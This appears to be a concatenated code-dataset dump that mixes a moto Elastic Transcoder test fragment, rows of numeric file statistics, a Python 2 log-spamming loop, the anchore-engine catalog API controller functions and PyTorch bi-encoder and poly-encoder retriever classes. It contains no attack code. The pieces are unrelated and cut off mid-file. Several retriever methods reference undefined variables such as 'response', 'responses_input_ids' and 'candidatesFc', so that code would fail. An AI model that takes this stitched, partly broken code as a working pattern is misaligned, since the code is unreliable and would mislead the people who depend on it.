ACCOUNT_ID, pipeline_id
)
)
@mock_elastictranscoder
def test_delete_pipeline():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
pipeline = client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
Role=role,
)["Pipeline"]
client.delete_pipeline(Id=pipeline["Id"])
response = client.list_pipelines()
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(200)
response.should.have.key("Pipelines").being.length_of(0)
def create_role_name(name):
return "arn:aws:iam::{}:role/{}".format(ACCOUNT_ID, name)
| 37.446384
| 166
| 0.685802
| 1,613
| 15,016
| 6.282703
| 0.081215
| 0.078942
| 0.102625
| 0.111901
| 0.924314
| 0.91494
| 0.905664
| 0.881093
| 0.881093
| 0.87162
| 0
| 0.007351
| 0.157499
| 15,016
| 400
| 167
| 37.54
| 0.793692
| 0.000266
| 0
| 0.755952
| 0
| 0.005952
| 0.269154
| 0.02072
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050595
| false
| 0
| 0.020833
| 0.002976
| 0.074405
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3fbaf2bdfdaab2f7c2ecc78999b877d18a05bfa2
| 941
|
py
|
Python
|
logger.py
|
mike-nguyen/openshift-log-test
|
b7148012daa9dfbfe1bef9b0478a791cc80202b8
|
[
"Apache-2.0"
] | null | null | null |
logger.py
|
mike-nguyen/openshift-log-test
|
b7148012daa9dfbfe1bef9b0478a791cc80202b8
|
[
"Apache-2.0"
] | null | null | null |
logger.py
|
mike-nguyen/openshift-log-test
|
b7148012daa9dfbfe1bef9b0478a791cc80202b8
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
for i in range(9223372036854775807):
print "%d long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message " % i
| 188.2
| 884
| 0.81084
| 164
| 941
| 4.652439
| 0.079268
| 0.46789
| 0.93578
| 1.179554
| 0.93578
| 0.93578
| 0.93578
| 0.93578
| 0.93578
| 0.93578
| 0
| 0.024516
| 0.176408
| 941
| 4
| 885
| 235.25
| 0.96
| 0.017003
| 0
| 0
| 0
| 0.5
| 0.941558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 15
|
b7b2cbc7252e59c1bfaa9252b561fd2b26d4d739
| 24,074
|
py
|
Python
|
anchore_engine/services/catalog/api/controllers/default_controller.py
|
jasonwilk/anchore-engine
|
3b587a597be985cf5895f4a249418855d4be3fae
|
[
"Apache-2.0"
] | null | null | null |
anchore_engine/services/catalog/api/controllers/default_controller.py
|
jasonwilk/anchore-engine
|
3b587a597be985cf5895f4a249418855d4be3fae
|
[
"Apache-2.0"
] | null | null | null |
anchore_engine/services/catalog/api/controllers/default_controller.py
|
jasonwilk/anchore-engine
|
3b587a597be985cf5895f4a249418855d4be3fae
|
[
"Apache-2.0"
] | null | null | null |
import connexion
import time
from anchore_engine import db
import anchore_engine.services.catalog.catalog_impl
import anchore_engine.services.common
from anchore_engine.subsys import logger
import anchore_engine.configuration.localconfig
import anchore_engine.subsys.servicestatus
from anchore_engine.subsys.metrics import flask_metrics, flask_metric_name, enabled as flask_metrics_enabled
def status():
httpcode = 500
try:
service_record = anchore_engine.subsys.servicestatus.get_my_service_record()
return_object = anchore_engine.subsys.servicestatus.get_status(service_record)
httpcode = 200
except Exception as err:
return_object = str(err)
return (return_object, httpcode)
def query_vulnerabilities_get(id=None, affected_package=None, affected_package_version=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'id': id, 'affected_package': affected_package, 'affected_package_version': affected_package_version})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.query_vulnerabilities(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def query_images_by_package_get(name=None, version=None, package_type=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'name': name, 'version': version, 'package_type': package_type})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.query_images_by_package(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def query_images_by_vulnerability_get(vulnerability_id=None, severity=None, namespace=None, affected_package=None, vendor_only=True):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'vulnerability_id': vulnerability_id, 'severity': severity, 'namespace': namespace, 'affected_package': affected_package, 'vendor_only': vendor_only})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.query_images_by_vulnerability(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def repo_post(regrepo=None, autosubscribe=False, lookuptag=None, bodycontent={}):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'regrepo': regrepo, 'autosubscribe': autosubscribe, 'lookuptag': lookuptag})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.repo(session, request_inputs, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def image_tags_get():
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image_tags(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def image_get(tag=None, digest=None, imageId=None, registry_lookup=False, history=False):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request,
default_params={'tag': tag, 'digest': digest, 'imageId': imageId, 'registry_lookup': registry_lookup, 'history': history})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def image_post(bodycontent={}, tag=None, digest=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'tag': tag, 'digest': digest})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image(session, request_inputs, bodycontent=bodycontent)
except Exception as err:
logger.exception('Error processing image add')
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route('/image/<imageDigest>', methods=['GET', 'PUT', 'DELETE'])
@flask_metrics.do_not_track()
def image_imageDigest_get(imageDigest):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image_imageDigest(session, request_inputs, imageDigest)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def image_imageDigest_put(imageDigest, bodycontent):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image_imageDigest(session, request_inputs, imageDigest, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def image_imageDigest_delete(imageDigest, force=False):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'force':False})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image_imageDigest(session, request_inputs, imageDigest)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route('/registry_lookup', methods=['GET'])
@flask_metrics.do_not_track()
def registry_lookup(tag=None, digest=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'tag': tag, 'digest': digest})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.registry_lookup(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route('/import', methods=['POST'])
def image_import(bodycontent):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image_import(session, request_inputs, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# policy calls
# subscription calls
# @api.route('/subscriptions', methods=['GET', 'POST'])
def subscriptions_get(subscription_key=None, subscription_type=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'subscription_key':subscription_key, 'subscription_type':subscription_type})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.subscriptions(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def subscriptions_post(bodycontent):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.subscriptions(session, request_inputs, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route('/subscriptions/<subscriptionId>', methods=['GET', 'PUT', 'DELETE'])
@flask_metrics.do_not_track()
def subscriptions_subscriptionId_get(subscriptionId):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.subscriptions(session, request_inputs, subscriptionId=subscriptionId)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def subscriptions_subscriptionId_put(subscriptionId, bodycontent):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.subscriptions(session, request_inputs, subscriptionId=subscriptionId, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def subscriptions_subscriptionId_delete(subscriptionId):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.subscriptions(session, request_inputs, subscriptionId=subscriptionId)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def events_get(source_servicename=None, source_hostid=None, resource_type=None, resource_id=None, level=None, since=None, before=None, page=None, limit=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request,
default_params={'source_servicename': source_servicename,
'source_hostid': source_hostid,
'resource_type': resource_type,
'resource_id': resource_id,
'level': level,
'since': since,
'before': before,
'page': page,
'limit': limit})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.events(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def events_post(bodycontent):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.events(session, request_inputs, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def events_delete(since=None, before=None, level=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'since': since, 'before': before, 'level': level})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.events(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def events_eventId_get(eventId):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.events_eventId(session, request_inputs, eventId)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def events_eventId_delete(eventId):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.events_eventId(session, request_inputs, eventId)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# user calls
# @api.route("/users", methods=['GET'])
def users_get():
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.users(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route("/users/<inuserId>", methods=['GET', 'DELETE'])
@flask_metrics.do_not_track()
def users_userId_get(inuserId):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.users_userId(session, request_inputs, inuserId)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def users_userId_delete(inuserId):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.users_userId(session, request_inputs, inuserId)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# archive calls
# @api.route('/archive/<bucket>/<archiveid>', methods=['GET', 'POST'])
@flask_metrics.do_not_track()
def archive_get(bucket, archiveid):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.archive(session, request_inputs, bucket, archiveid)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def archive_post(bucket, archiveid, bodycontent):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.archive(session, request_inputs, bucket, archiveid, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# system/service calls
# @api.route("/system", methods=['GET'])
def system_get():
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route("/system/services", methods=['GET'])
def system_services_get():
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_services(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route("/system/services/<servicename>", methods=['GET'])
@flask_metrics.do_not_track()
def system_services_servicename_get(servicename):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_services_servicename(session, request_inputs, servicename)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route("/system/services/<servicename>/<hostId>", methods=['GET', 'DELETE'])
@flask_metrics.do_not_track()
def system_services_servicename_hostId_get(servicename, hostId):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_services_servicename_hostId(session, request_inputs, servicename, hostId)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def system_services_servicename_hostId_delete(servicename, hostId):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_services_servicename_hostId(session, request_inputs, servicename, hostId)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route("/system/registries", methods=['GET', 'POST'])
def system_registries_get():
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_registries(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def system_registries_post(bodycontent, validate=True):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'validate':validate})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_registries(session, request_inputs, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route("/system/registries/<registry>", methods=['GET', 'DELETE', 'PUT'])
@flask_metrics.do_not_track()
def system_registries_registry_get(registry):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_registries_registry(session, request_inputs, registry)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def system_registries_registry_delete(registry):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_registries_registry(session, request_inputs, registry)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def system_registries_registry_put(registry, bodycontent, validate=True):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'validate':validate})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_registries_registry(session, request_inputs, registry, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route("/system/subscriptions", methods=['GET'])
def system_subscriptions_get():
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_subscriptions(session, request_inputs)
except Exception as err:
logger.exception('Error fetching subscriptions')
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def system_prune_get():
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_prune_listresources(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def system_prune_resourcetype_get(resourcetype, dangling=True, olderthan=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'dangling': dangling, 'olderthan': olderthan})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_prune(session, request_inputs, resourcetype)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def system_prune_resourcetype_post(resourcetype, bodycontent):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_prune(session, request_inputs, resourcetype, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
| 40.80339
| 257
| 0.707651
| 2,750
| 24,074
| 5.923636
| 0.044727
| 0.092818
| 0.108287
| 0.072192
| 0.852056
| 0.847759
| 0.845365
| 0.840516
| 0.83051
| 0.818355
| 0
| 0.00671
| 0.201421
| 24,074
| 589
| 258
| 40.872666
| 0.840624
| 0.039586
| 0
| 0.760095
| 0
| 0
| 0.018658
| 0.001039
| 0
| 0
| 0
| 0
| 0
| 1
| 0.099762
| false
| 0
| 0.026128
| 0
| 0.225653
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b7d27a5ce2c9279fcdaf133039661b711364c355
| 10,625
|
py
|
Python
|
src/retrievers.py
|
M-Puig/Erato
|
97f7cf913c54aacc55bbc76f4eadc55641a44c2d
|
[
"MIT"
] | null | null | null |
src/retrievers.py
|
M-Puig/Erato
|
97f7cf913c54aacc55bbc76f4eadc55641a44c2d
|
[
"MIT"
] | null | null | null |
src/retrievers.py
|
M-Puig/Erato
|
97f7cf913c54aacc55bbc76f4eadc55641a44c2d
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
#Bi-encoder
class RetrieverBiencoder(nn.Module):
def __init__(self, bert):
super().__init__()
self.bert = bert
def score(self, context, context_mask, responses, responses_mask):
context_vec = self.bert(context, context_mask)[0][:,0,:] # [bs,dim]
batch_size, res_length = response.shape
responses_vec = self.bert(responses_input_ids, responses_input_masks)[0][:,0,:] # [bs,dim]
responses_vec = responses_vec.view(batch_size, 1, -1)
responses_vec = responses_vec.squeeze(1)
context_vec = context_vec.unsqueeze(1)
dot_product = torch.matmul(context_vec, responses_vec.permute(0, 2, 1)).squeeze()
return dot_product
def compute_loss(self, context, context_mask, response, response_mask):
context_vec = self.bert(context, context_mask)[0] # [bs,dim]
batch_size, res_length = response.shape
responses_vec = self.bert(response, response_mask)[0][:,0,:] # [bs,dim]
#responses_vec = responses_vec.view(batch_size, 1, -1)
print(context_vec.shape)
print(responses_vec.shape)
responses_vec = responses_vec.squeeze(1)
dot_product = torch.matmul(context_vec, responses_vec.t()) # [bs, bs]
mask = torch.eye(context.size(0)).to(context_mask.device)
loss = F.log_softmax(dot_product, dim=-1) * mask
loss = (-loss.sum(dim=1)).mean()
return loss
#Single Bert Polyencoder
class RetrieverPolyencoder(nn.Module):
def __init__(self, bert, max_len = 300, hidden_dim = 768, out_dim = 64, num_layers = 2, dropout=0.1, device=None):
super().__init__()
if device==None:
if torch.cuda.is_available():
self.device = torch.device("cuda")
else:
self.device = torch.device("cpu")
else:
self.device = device
self.hidden_dim = hidden_dim
self.max_len = max_len
self.out_dim = out_dim
self.bert = bert
# Context layers
self.contextDropout = nn.Dropout(dropout)
# Candidates layers
self.pos_emb = nn.Embedding(self.max_len, self.hidden_dim)
self.candidatesDropout = nn.Dropout(dropout)
self.att_dropout = nn.Dropout(dropout)
def attention(self, q, k, v, vMask=None):
w = torch.matmul(q, k.transpose(-1, -2))
if vMask is not None:
w *= vMask.unsqueeze(1)
w = F.softmax(w, -1)
w = self.att_dropout(w)
score = torch.matmul(w, v)
return score
def score(self, context, context_mask, responses, responses_mask):
"""Run the model on the source and compute the loss on the target.
Args:
source: An integer tensor with shape (max_source_sequence_length,
batch_size) containing subword indices for the source sentences.
target: An integer tensor with shape (max_target_sequence_length,
batch_size) containing subword indices for the target sentences.
Returns:
A scalar float tensor representing cross-entropy loss on the current batch
divided by the number of target tokens in the batch.
Many of the target tokens will be pad tokens. You should mask the loss
from these tokens using appropriate mask on the target tokens loss.
"""
batch_size, nb_cand, seq_len = responses.shape
# Context
context_encoded = self.bert(context,context_mask)[0][:,0,:]
pos_emb = self.pos_emb(torch.arange(self.max_len).to(self.device))
context_att = self.attention(pos_emb, context_encoded, context_encoded, context_mask)
# Response
responses_encoded = self.bert(responses.view(-1,responses.shape[2]), responses_mask.view(-1,responses.shape[2]))[0][:,0,:]
responses_encoded = responses_encoded.view(batch_size,nb_cand,-1)
response_encoded = self.candidatesFc(response_encoded)
context_emb = self.attention(responses_encoded, context_att, context_att).squeeze()
dot_product = (context_emb*responses_encoded).sum(-1)
return dot_product
def compute_loss(self, context, context_mask, response, response_mask):
"""Run the model on the source and compute the loss on the target.
Args:
source: An integer tensor with shape (max_source_sequence_length,
batch_size) containing subword indices for the source sentences.
target: An integer tensor with shape (max_target_sequence_length,
batch_size) containing subword indices for the target sentences.
Returns:
A scalar float tensor representing cross-entropy loss on the current batch
divided by the number of target tokens in the batch.
Many of the target tokens will be pad tokens. You should mask the loss
from these tokens using appropriate mask on the target tokens loss.
"""
batch_size = context.shape[0]
# Context
context_encoded = self.bert(context,context_mask)[0]
pos_emb = self.pos_emb(torch.arange(self.max_len).to(self.device))
context_att = self.attention(pos_emb, context_encoded, context_encoded, context_mask)
# Response
response_encoded = self.bert(response, response_mask)[0][:,0,:]
response_encoded = response_encoded.unsqueeze(0).expand(batch_size, batch_size, response_encoded.shape[1])
context_emb = self.attention(response_encoded, context_att, context_att).squeeze()
dot_product = (context_emb*response_encoded).sum(-1)
mask = torch.eye(batch_size).to(self.device)
loss = F.log_softmax(dot_product, dim=-1) * mask
loss = (-loss.sum(dim=1)).mean()
return loss
#Double Bert Polyencoder
class RetrieverPolyencoder_double(nn.Module):
def __init__(self, contextBert, candidateBert, vocab, max_len = 300, hidden_dim = 768, out_dim = 64, num_layers = 2, dropout=0.1, device=None):
super().__init__()
if device==None:
if torch.cuda.is_available():
self.device = torch.device("cuda")
else:
self.device = torch.device("cpu")
else:
self.device = device
self.hidden_dim = hidden_dim
self.max_len = max_len
self.out_dim = out_dim
# Context layers
self.contextBert = contextBert
self.contextDropout = nn.Dropout(dropout)
self.contextFc = nn.Linear(self.hidden_dim, self.out_dim)
# Candidates layers
self.candidatesBert = candidateBert
self.pos_emb = nn.Embedding(self.max_len, self.hidden_dim)
self.candidatesDropout = nn.Dropout(dropout)
self.candidatesFc = nn.Linear(self.hidden_dim, self.out_dim)
self.att_dropout = nn.Dropout(dropout)
def attention(self, q, k, v, vMask=None):
w = torch.matmul(q, k.transpose(-1, -2))
if vMask is not None:
w *= vMask.unsqueeze(1)
w = F.softmax(w, -1)
w = self.att_dropout(w)
score = torch.matmul(w, v)
return score
def score(self, context, context_mask, responses, responses_mask):
"""Run the model on the source and compute the loss on the target.
Args:
source: An integer tensor with shape (max_source_sequence_length,
batch_size) containing subword indices for the source sentences.
target: An integer tensor with shape (max_target_sequence_length,
batch_size) containing subword indices for the target sentences.
Returns:
A scalar float tensor representing cross-entropy loss on the current batch
divided by the number of target tokens in the batch.
Many of the target tokens will be pad tokens. You should mask the loss
from these tokens using appropriate mask on the target tokens loss.
"""
batch_size, nb_cand, seq_len = responses.shape
# Context
context_encoded = self.contextBert(context,context_mask)[-1]
pos_emb = self.pos_emb(torch.arange(self.max_len).to(self.device))
context_att = self.attention(pos_emb, context_encoded, context_encoded, context_mask)
# Response
responses_encoded = self.candidatesBert(responses.view(-1,responses.shape[2]), responses_mask.view(-1,responses.shape[2]))[-1][:,0,:]
responses_encoded = responses_encoded.view(batch_size,nb_cand,-1)
context_emb = self.attention(responses_encoded, context_att, context_att).squeeze()
dot_product = (context_emb*responses_encoded).sum(-1)
return dot_product
def compute_loss(self, context, context_mask, response, response_mask):
"""Run the model on the source and compute the loss on the target.
Args:
source: An integer tensor with shape (max_source_sequence_length,
batch_size) containing subword indices for the source sentences.
target: An integer tensor with shape (max_target_sequence_length,
batch_size) containing subword indices for the target sentences.
Returns:
A scalar float tensor representing cross-entropy loss on the current batch
divided by the number of target tokens in the batch.
Many of the target tokens will be pad tokens. You should mask the loss
from these tokens using appropriate mask on the target tokens loss.
"""
batch_size = context.shape[0]
# Context
context_encoded = self.contextBert(context,context_mask)[-1]
pos_emb = self.pos_emb(torch.arange(self.max_len).to(self.device))
context_att = self.attention(pos_emb, context_encoded, context_encoded, context_mask)
# Response
response_encoded = self.candidatesBert(response, response_mask)[-1][:,0,:]
response_encoded = response_encoded.unsqueeze(0).expand(batch_size, batch_size, response_encoded.shape[1])
context_emb = self.attention(response_encoded, context_att, context_att).squeeze()
dot_product = (context_emb*response_encoded).sum(-1)
mask = torch.eye(batch_size).to(self.device)
loss = F.log_softmax(dot_product, dim=-1) * mask
loss = (-loss.sum(dim=1)).mean()
return loss
| 43.016194
| 147
| 0.646118
| 1,366
| 10,625
| 4.836018
| 0.106149
| 0.032698
| 0.032698
| 0.023009
| 0.90115
| 0.887981
| 0.87148
| 0.864668
| 0.855283
| 0.816228
| 0
| 0.011107
| 0.262776
| 10,625
| 247
| 148
| 43.016194
| 0.832248
| 0.272282
| 0
| 0.761538
| 0
| 0
| 0.001908
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084615
| false
| 0
| 0.023077
| 0
| 0.192308
| 0.015385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4d2ced5e97cc035d17294a83dd2a2034a7d4d031
| 121,784
|
py
|
Python
|
gs_api_client/swagger/api/usage_api.py
|
gridscale/gridscale_api_client_python
|
755b8e8a017784a4f5c6b3a577338ff988c41a9a
|
[
"MIT"
] | 7
|
2019-07-12T13:59:45.000Z
|
2021-03-16T08:46:20.000Z
|
gs_api_client/swagger/api/usage_api.py
|
gridscale/gridscale_api_client_python
|
755b8e8a017784a4f5c6b3a577338ff988c41a9a
|
[
"MIT"
] | 13
|
2020-01-23T07:50:29.000Z
|
2022-03-21T14:32:40.000Z
|
gs_api_client/swagger/api/usage_api.py
|
